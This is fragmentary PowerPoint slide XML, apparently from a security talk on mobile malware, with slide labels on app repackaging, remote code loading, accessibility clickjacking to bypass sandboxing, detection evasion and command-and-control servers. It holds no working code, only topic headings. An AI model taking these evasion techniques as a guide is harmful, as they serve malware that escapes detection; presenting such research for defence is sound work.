              </a:r>
              <a:endParaRPr lang="en-US" sz="11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13849" y="2759736"/>
            <a:ext cx="2691496" cy="398975"/>
            <a:chOff x="5113849" y="2991236"/>
            <a:chExt cx="2691496" cy="398975"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="345" name="Right Arrow 344"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5113849" y="2991236"/>
              <a:ext cx="2691496" cy="209920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278878" y="3051312"/>
              <a:ext cx="646158" cy="3388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Malicious code</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="11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37143" y="3407457"/>
            <a:ext cx="1590012" cy="402316"/>
            <a:chOff x="4637143" y="3638957"/>
            <a:chExt cx="1590012" cy="402316"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="347" name="Right Arrow 346"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4637143" y="3638957"/>
              <a:ext cx="1590012" cy="209920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279866" y="3702374"/>
              <a:ext cx="646158" cy="3388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Malicious code</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="11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1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5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" grpId="0" animBg="1"/>
      <p:bldP spid="344" grpId="0" animBg="1"/>
      <p:bldP spid="3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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Repackaging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18963835"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="519546" y="1386840"/>
          <a:ext cx="8294254" cy="1462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Line Callout 2 (Border and Accent Bar) 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4617719" y="3139440"/>
            <a:ext cx="3398521" cy="1173480"/>
          </a:xfrm>
          <a:prstGeom prst="accentBorderCallout2">
            <a:avLst>
              <a:gd name="adj1" fmla="val 21347"/>
              <a:gd name="adj2" fmla="val -3400"/>
              <a:gd name="adj3" fmla="val 21347"/>
              <a:gd name="adj4" fmla="val -12183"/>
              <a:gd name="adj5" fmla="val -47431"/>
              <a:gd name="adj6" fmla="val -33769"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="6F5D2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/>
                <a:ea typeface="Lato" charset="0"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Patched </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Lato" charset="0"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>app </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Lato" charset="0"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>loads code</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" smtClean="0">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Lato" charset="0"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Lato" charset="0"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Lato" charset="0"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>remote </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Lato" charset="0"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>server</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Lato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62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45941"/>
            <a:ext cx="9144000" cy="3897559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Live Demo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12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Evolution </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>mobile malware</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Accessibility Clickjacking</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>: circumventing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>app sandboxing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Evading current malware </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>etection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>echniques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Recommendations &amp; summary</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13630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52217" y="2183383"/>
            <a:ext cx="1920558" cy="530179"/>
            <a:chOff x="1852217" y="2414883"/>
            <a:chExt cx="1920558" cy="530179"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="351" name="Right Arrow 350"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1852217" y="2414883"/>
              <a:ext cx="1920558" cy="530179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029167" y="2510627"/>
              <a:ext cx="16641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FF"/>
                  </a:solidFill>
                  <a:latin typeface="Arial"/>
                  <a:cs typeface="Arial"/>
                </a:rPr>
                <a:t>Get code to </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="12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execute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35577" y="2614850"/>
            <a:ext cx="1920558" cy="530179"/>
            <a:chOff x="2035577" y="2846350"/>
            <a:chExt cx="1920558" cy="530179"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="348" name="Right Arrow 347"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="2035577" y="2846350"/>
              <a:ext cx="1920558" cy="530179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/>
                <a:cs typeface="Arial"/>
              </a:endParaRPr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2123176" y="2940364"/>
              <a:ext cx="18037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Naïve code returned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about the CNC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Server?</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>it be blacklisted?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54003" y="1698025"/>
            <a:ext cx="1138666" cy="1836415"/>
            <a:chOff x="715320" y="2622867"/>
            <a:chExt cx="1138666" cy="1836415"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="107" name="Rectangle 106"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="715320" y="2622867"/>
              <a:ext cx="1138666" cy="18364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824528" y="2948407"/>
              <a:ext cx="875984" cy="1467086"/>
              <a:chOff x="2266051" y="1450709"/>
              <a:chExt cx="2198318" cy="3681709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2266051" y="1468556"/>
                <a:ext cx="2198318" cy="366386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rapezoid 109"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="10800000">
                <a:off x="2582053" y="1450709"/>
                <a:ext cx="1566316" cy="1686284"/>
              </a:xfrm>
              <a:prstGeom prst="trapezoid">
                <a:avLst>
                  <a:gd name="adj" fmla="val 23881"/>
                </a:avLst>
              </a:prstGeom>
              <a:gradFill flip="none" rotWithShape="1">
                <a:gsLst>
                  <a:gs pos="59000">
                    <a:schemeClr val="bg1">
                      <a:alpha val="74000"/>
                    </a:schemeClr>
                  </a:gs>
                  <a:gs pos="41000">
                    <a:srgbClr val="FFFFFF">
                      <a:alpha val="74000"/>
                    </a:srgbClr>
                  </a:gs>
                  <a:gs pos="39000">
                    <a:srgbClr val="FFFFFF">
                      <a:alpha val="67000"/>
                    </a:srgbClr>
                  </a:gs>
                  <a:gs pos="61000">
                    <a:schemeClr val="bg1">
                      <a:alpha val="67000"/>
                    </a:schemeClr>
                  </a:gs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92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Delay 5"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="5400000">
                <a:off x="2731399" y="3125209"/>
                <a:ext cx="1267622" cy="825036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7622" h="825036">
                    <a:moveTo>
                      <a:pt x="72605" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="496576" y="0"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="730729" y="0"/>
                      <a:pt x="1267622" y="184691"/>
                      <a:pt x="1267622" y="412518"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1267622" y="640345"/>
                      <a:pt x="730729" y="825036"/>
                      <a:pt x="496576" y="825036"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="72605" y="825035"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="-20837" y="550023"/>
                      <a:pt x="-27511" y="248315"/>
                      <a:pt x="7260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2671935" y="1503488"/>
                <a:ext cx="1386550" cy="150659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Delay 5"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="5400000">
                <a:off x="2735708" y="3307844"/>
                <a:ext cx="1259004" cy="451151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  <a:gd name="connsiteX0" fmla="*/ 95168 w 1290185"/>
                  <a:gd name="connsiteY0" fmla="*/ 0 h 825036"/>
                  <a:gd name="connsiteX1" fmla="*/ 519139 w 1290185"/>
                  <a:gd name="connsiteY1" fmla="*/ 0 h 825036"/>
                  <a:gd name="connsiteX2" fmla="*/ 1290185 w 1290185"/>
                  <a:gd name="connsiteY2" fmla="*/ 412518 h 825036"/>
                  <a:gd name="connsiteX3" fmla="*/ 519139 w 1290185"/>
                  <a:gd name="connsiteY3" fmla="*/ 825036 h 825036"/>
                  <a:gd name="connsiteX4" fmla="*/ 55122 w 1290185"/>
                  <a:gd name="connsiteY4" fmla="*/ 825034 h 825036"/>
                  <a:gd name="connsiteX5" fmla="*/ 95168 w 1290185"/>
                  <a:gd name="connsiteY5" fmla="*/ 0 h 825036"/>
                  <a:gd name="connsiteX0" fmla="*/ 72607 w 1307667"/>
                  <a:gd name="connsiteY0" fmla="*/ 1 h 825038"/>
                  <a:gd name="connsiteX1" fmla="*/ 536621 w 1307667"/>
                  <a:gd name="connsiteY1" fmla="*/ 2 h 825038"/>
                  <a:gd name="connsiteX2" fmla="*/ 1307667 w 1307667"/>
                  <a:gd name="connsiteY2" fmla="*/ 412520 h 825038"/>
                  <a:gd name="connsiteX3" fmla="*/ 536621 w 1307667"/>
                  <a:gd name="connsiteY3" fmla="*/ 825038 h 825038"/>
                  <a:gd name="connsiteX4" fmla="*/ 72604 w 1307667"/>
                  <a:gd name="connsiteY4" fmla="*/ 825036 h 825038"/>
                  <a:gd name="connsiteX5" fmla="*/ 72607 w 1307667"/>
                  <a:gd name="connsiteY5" fmla="*/ 1 h 825038"/>
                  <a:gd name="connsiteX0" fmla="*/ 58234 w 1293294"/>
                  <a:gd name="connsiteY0" fmla="*/ -1 h 825036"/>
                  <a:gd name="connsiteX1" fmla="*/ 522248 w 1293294"/>
                  <a:gd name="connsiteY1" fmla="*/ 0 h 825036"/>
                  <a:gd name="connsiteX2" fmla="*/ 1293294 w 1293294"/>
                  <a:gd name="connsiteY2" fmla="*/ 412518 h 825036"/>
                  <a:gd name="connsiteX3" fmla="*/ 522248 w 1293294"/>
                  <a:gd name="connsiteY3" fmla="*/ 825036 h 825036"/>
                  <a:gd name="connsiteX4" fmla="*/ 58231 w 1293294"/>
                  <a:gd name="connsiteY4" fmla="*/ 825034 h 825036"/>
                  <a:gd name="connsiteX5" fmla="*/ 58234 w 1293294"/>
                  <a:gd name="connsiteY5" fmla="*/ -1 h 825036"/>
                  <a:gd name="connsiteX0" fmla="*/ 42588 w 1277648"/>
                  <a:gd name="connsiteY0" fmla="*/ 1 h 825038"/>
                  <a:gd name="connsiteX1" fmla="*/ 506602 w 1277648"/>
                  <a:gd name="connsiteY1" fmla="*/ 2 h 825038"/>
                  <a:gd name="connsiteX2" fmla="*/ 1277648 w 1277648"/>
                  <a:gd name="connsiteY2" fmla="*/ 412520 h 825038"/>
                  <a:gd name="connsiteX3" fmla="*/ 506602 w 1277648"/>
                  <a:gd name="connsiteY3" fmla="*/ 825038 h 825038"/>
                  <a:gd name="connsiteX4" fmla="*/ 42585 w 1277648"/>
                  <a:gd name="connsiteY4" fmla="*/ 825036 h 825038"/>
                  <a:gd name="connsiteX5" fmla="*/ 42588 w 1277648"/>
                  <a:gd name="connsiteY5" fmla="*/ 1 h 82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48" h="825038">
                    <a:moveTo>
                      <a:pt x="42588" y="1"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="506602" y="2"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="740755" y="2"/>
                      <a:pt x="1277648" y="184693"/>
                      <a:pt x="1277648" y="412520"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1277648" y="640347"/>
                      <a:pt x="740755" y="825038"/>
                      <a:pt x="506602" y="825038"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="42585" y="825036"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="-10810" y="550025"/>
                      <a:pt x="-17482" y="248315"/>
                      <a:pt x="42588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bg1">
                      <a:alpha val="51000"/>
                    </a:schemeClr>
                  </a:gs>
                  <a:gs pos="59000">
                    <a:schemeClr val="bg1">
                      <a:alpha val="32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6"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3124930" y="3941265"/>
                <a:ext cx="480561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Stored Data 8"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="5400000">
                <a:off x="3284980" y="2889707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pattFill prst="nar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Stored Data 8"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="5400000">
                <a:off x="3284980" y="2889706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gradFill>
                <a:gsLst>
                  <a:gs pos="94000">
                    <a:srgbClr val="1D1D1D">
                      <a:alpha val="16000"/>
                    </a:srgbClr>
                  </a:gs>
                  <a:gs pos="5000">
                    <a:srgbClr val="131313">
                      <a:alpha val="60000"/>
                    </a:srgbClr>
                  </a:gs>
                  <a:gs pos="0">
                    <a:schemeClr val="tx1"/>
                  </a:gs>
                  <a:gs pos="50500">
                    <a:srgbClr val="262626"/>
                  </a:gs>
                  <a:gs pos="42000">
                    <a:schemeClr val="tx1">
                      <a:lumMod val="85000"/>
                      <a:lumOff val="15000"/>
                      <a:alpha val="93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 133"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2960628" y="3197416"/>
                <a:ext cx="809164" cy="33019"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="connsiteX0" fmla="*/ 0 w 840981"/>
                  <a:gd name="connsiteY0" fmla="*/ 33372 h 33372"/>
                  <a:gd name="connsiteX1" fmla="*/ 420490 w 840981"/>
                  <a:gd name="connsiteY1" fmla="*/ 0 h 33372"/>
                  <a:gd name="connsiteX2" fmla="*/ 840981 w 840981"/>
                  <a:gd name="connsiteY2" fmla="*/ 33372 h 33372"/>
                  <a:gd name="connsiteX0" fmla="*/ 0 w 840981"/>
                  <a:gd name="connsiteY0" fmla="*/ 24102 h 24102"/>
                  <a:gd name="connsiteX1" fmla="*/ 420490 w 840981"/>
                  <a:gd name="connsiteY1" fmla="*/ 0 h 24102"/>
                  <a:gd name="connsiteX2" fmla="*/ 840981 w 840981"/>
                  <a:gd name="connsiteY2" fmla="*/ 24102 h 24102"/>
                  <a:gd name="connsiteX0" fmla="*/ 0 w 824799"/>
                  <a:gd name="connsiteY0" fmla="*/ 24102 h 24102"/>
                  <a:gd name="connsiteX1" fmla="*/ 404308 w 824799"/>
                  <a:gd name="connsiteY1" fmla="*/ 0 h 24102"/>
                  <a:gd name="connsiteX2" fmla="*/ 824799 w 824799"/>
                  <a:gd name="connsiteY2" fmla="*/ 24102 h 24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4799" h="24102">
                    <a:moveTo>
                      <a:pt x="0" y="24102"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="140163" y="7416"/>
                      <a:pt x="266842" y="0"/>
                      <a:pt x="404308" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="541774" y="0"/>
                      <a:pt x="824799" y="24102"/>
                      <a:pt x="824799" y="241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6"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3194770" y="3941265"/>
                <a:ext cx="340880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50500">
                    <a:srgbClr val="FFFFFF">
                      <a:alpha val="19000"/>
                    </a:srgbClr>
                  </a:gs>
                  <a:gs pos="42000">
                    <a:schemeClr val="bg1">
                      <a:alpha val="27000"/>
                    </a:schemeClr>
                  </a:gs>
                  <a:gs pos="59000">
                    <a:schemeClr val="bg1">
                      <a:alpha val="23000"/>
                    </a:schemeClr>
                  </a:gs>
                  <a:gs pos="100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ounded Rectangle 135"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3235719" y="4159332"/>
                <a:ext cx="258982" cy="601579"/>
              </a:xfrm>
              <a:prstGeom prst="roundRect">
                <a:avLst>
                  <a:gd name="adj" fmla="val 29055"/>
                </a:avLst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76200" contourW="38100">
                <a:bevelT w="139700" h="139700" prst="divot"/>
                <a:extrusionClr>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff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ounded Rectangle 136"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3256981" y="4215675"/>
                <a:ext cx="216458" cy="260072"/>
              </a:xfrm>
              <a:prstGeom prst="roundRect">
                <a:avLst>
                  <a:gd name="adj" fmla="val 26999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bevelT w="50800" h="139700" prst="divot"/>
                <a:extrusionClr>
                  <a:schemeClr val="bg1">
                    <a:lumMod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6051" y="1468555"/>
                <a:ext cx="2198318" cy="227805"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="139" name="TextBox 138"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="746758" y="2652057"/>
              <a:ext cx="10965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Analyzer</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1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452477" y="50285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0" name="Right Arrow 339"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="5093520" y="1914173"/>
            <a:ext cx="1102489" cy="2099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4" name="Right Arrow 343"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="5104046" y="2570682"/>
            <a:ext cx="2700075" cy="2099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6" name="Right Arrow 345"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4969564" y="3201699"/>
            <a:ext cx="1244409" cy="20992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6269960" y="1337641"/>
            <a:ext cx="802905" cy="1196927"/>
            <a:chOff x="5488955" y="3058000"/>
            <a:chExt cx="802905" cy="1196927"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="34" name="Rectangle 33"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5488955" y="3058000"/>
              <a:ext cx="802905" cy="119692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5581162" y="3075558"/>
              <a:ext cx="666021" cy="1115443"/>
              <a:chOff x="2266051" y="1450709"/>
              <a:chExt cx="2198318" cy="3681709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2266051" y="1468556"/>
                <a:ext cx="2198318" cy="36638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Trapezoid 173"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="10800000">
                <a:off x="2582053" y="1450709"/>
                <a:ext cx="1566316" cy="1686284"/>
              </a:xfrm>
              <a:prstGeom prst="trapezoid">
                <a:avLst>
                  <a:gd name="adj" fmla="val 23881"/>
                </a:avLst>
              </a:prstGeom>
              <a:gradFill flip="none" rotWithShape="1">
                <a:gsLst>
                  <a:gs pos="59000">
                    <a:schemeClr val="bg1">
                      <a:alpha val="74000"/>
                    </a:schemeClr>
                  </a:gs>
                  <a:gs pos="41000">
                    <a:srgbClr val="FFFFFF">
                      <a:alpha val="74000"/>
                    </a:srgbClr>
                  </a:gs>
                  <a:gs pos="39000">
                    <a:srgbClr val="FFFFFF">
                      <a:alpha val="67000"/>
                    </a:srgbClr>
                  </a:gs>
                  <a:gs pos="61000">
                    <a:schemeClr val="bg1">
                      <a:alpha val="67000"/>
                    </a:schemeClr>
                  </a:gs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92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Delay 5"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="5400000">
                <a:off x="2731399" y="3125209"/>
                <a:ext cx="1267622" cy="825036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7622" h="825036">
                    <a:moveTo>
                      <a:pt x="72605" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="496576" y="0"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="730729" y="0"/>
                      <a:pt x="1267622" y="184691"/>
                      <a:pt x="1267622" y="412518"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1267622" y="640345"/>
                      <a:pt x="730729" y="825036"/>
                      <a:pt x="496576" y="825036"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="72605" y="825035"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="-20837" y="550023"/>
                      <a:pt x="-27511" y="248315"/>
                      <a:pt x="7260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2671935" y="1503488"/>
                <a:ext cx="1386550" cy="150659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Delay 5"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="5400000">
                <a:off x="2735708" y="3307844"/>
                <a:ext cx="1259004" cy="451151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  <a:gd name="connsiteX0" fmla="*/ 95168 w 1290185"/>
                  <a:gd name="connsiteY0" fmla="*/ 0 h 825036"/>
                  <a:gd name="connsiteX1" fmla="*/ 519139 w 1290185"/>
                  <a:gd name="connsiteY1" fmla="*/ 0 h 825036"/>
                  <a:gd name="connsiteX2" fmla="*/ 1290185 w 1290185"/>
                  <a:gd name="connsiteY2" fmla="*/ 412518 h 825036"/>
                  <a:gd name="connsiteX3" fmla="*/ 519139 w 1290185"/>
                  <a:gd name="connsiteY3" fmla="*/ 825036 h 825036"/>
                  <a:gd name="connsiteX4" fmla="*/ 55122 w 1290185"/>
                  <a:gd name="connsiteY4" fmla="*/ 825034 h 825036"/>
                  <a:gd name="connsiteX5" fmla="*/ 95168 w 1290185"/>
                  <a:gd name="connsiteY5" fmla="*/ 0 h 825036"/>
                  <a:gd name="connsiteX0" fmla="*/ 72607 w 1307667"/>
                  <a:gd name="connsiteY0" fmla="*/ 1 h 825038"/>
                  <a:gd name="connsiteX1" fmla="*/ 536621 w 1307667"/>
                  <a:gd name="connsiteY1" fmla="*/ 2 h 825038"/>
                  <a:gd name="connsiteX2" fmla="*/ 1307667 w 1307667"/>
                  <a:gd name="connsiteY2" fmla="*/ 412520 h 825038"/>
                  <a:gd name="connsiteX3" fmla="*/ 536621 w 1307667"/>
                  <a:gd name="connsiteY3" fmla="*/ 825038 h 825038"/>
                  <a:gd name="connsiteX4" fmla="*/ 72604 w 1307667"/>
                  <a:gd name="connsiteY4" fmla="*/ 825036 h 825038"/>
                  <a:gd name="connsiteX5" fmla="*/ 72607 w 1307667"/>
                  <a:gd name="connsiteY5" fmla="*/ 1 h 825038"/>
                  <a:gd name="connsiteX0" fmla="*/ 58234 w 1293294"/>
                  <a:gd name="connsiteY0" fmla="*/ -1 h 825036"/>
                  <a:gd name="connsiteX1" fmla="*/ 522248 w 1293294"/>
                  <a:gd name="connsiteY1" fmla="*/ 0 h 825036"/>
                  <a:gd name="connsiteX2" fmla="*/ 1293294 w 1293294"/>
                  <a:gd name="connsiteY2" fmla="*/ 412518 h 825036"/>
                  <a:gd name="connsiteX3" fmla="*/ 522248 w 1293294"/>
                  <a:gd name="connsiteY3" fmla="*/ 825036 h 825036"/>
                  <a:gd name="connsiteX4" fmla="*/ 58231 w 1293294"/>
                  <a:gd name="connsiteY4" fmla="*/ 825034 h 825036"/>
                  <a:gd name="connsiteX5" fmla="*/ 58234 w 1293294"/>
                  <a:gd name="connsiteY5" fmla="*/ -1 h 825036"/>
                  <a:gd name="connsiteX0" fmla="*/ 42588 w 1277648"/>
                  <a:gd name="connsiteY0" fmla="*/ 1 h 825038"/>
                  <a:gd name="connsiteX1" fmla="*/ 506602 w 1277648"/>
                  <a:gd name="connsiteY1" fmla="*/ 2 h 825038"/>
                  <a:gd name="connsiteX2" fmla="*/ 1277648 w 1277648"/>
                  <a:gd name="connsiteY2" fmla="*/ 412520 h 825038"/>
                  <a:gd name="connsiteX3" fmla="*/ 506602 w 1277648"/>
                  <a:gd name="connsiteY3" fmla="*/ 825038 h 825038"/>
                  <a:gd name="connsiteX4" fmla="*/ 42585 w 1277648"/>
                  <a:gd name="connsiteY4" fmla="*/ 825036 h 825038"/>
                  <a:gd name="connsiteX5" fmla="*/ 42588 w 1277648"/>
                  <a:gd name="connsiteY5" fmla="*/ 1 h 82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48" h="825038">
                    <a:moveTo>
                      <a:pt x="42588" y="1"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="506602" y="2"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="740755" y="2"/>
                      <a:pt x="1277648" y="184693"/>
                      <a:pt x="1277648" y="412520"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1277648" y="640347"/>
                      <a:pt x="740755" y="825038"/>
                      <a:pt x="506602" y="825038"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="42585" y="825036"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="-10810" y="550025"/>
                      <a:pt x="-17482" y="248315"/>
                      <a:pt x="42588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bg1">
                      <a:alpha val="51000"/>
                    </a:schemeClr>
                  </a:gs>
                  <a:gs pos="59000">
                    <a:schemeClr val="bg1">
                      <a:alpha val="32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6"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3124930" y="3941265"/>
                <a:ext cx="480561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Stored Data 8"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="5400000">
                <a:off x="3284980" y="2889707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pattFill prst="nar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Stored Data 8"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="5400000">
                <a:off x="3284980" y="2889706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gradFill>
                <a:gsLst>
                  <a:gs pos="94000">
                    <a:srgbClr val="1D1D1D">
                      <a:alpha val="16000"/>
                    </a:srgbClr>
                  </a:gs>
                  <a:gs pos="5000">
                    <a:srgbClr val="131313">
                      <a:alpha val="60000"/>
                    </a:srgbClr>
                  </a:gs>
                  <a:gs pos="0">
                    <a:schemeClr val="tx1"/>
                  </a:gs>
                  <a:gs pos="50500">
                    <a:srgbClr val="262626"/>
                  </a:gs>
                  <a:gs pos="42000">
                    <a:schemeClr val="tx1">
                      <a:lumMod val="85000"/>
                      <a:lumOff val="15000"/>
                      <a:alpha val="93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 180"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2960628" y="3197416"/>
                <a:ext cx="809164" cy="33019"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="connsiteX0" fmla="*/ 0 w 840981"/>
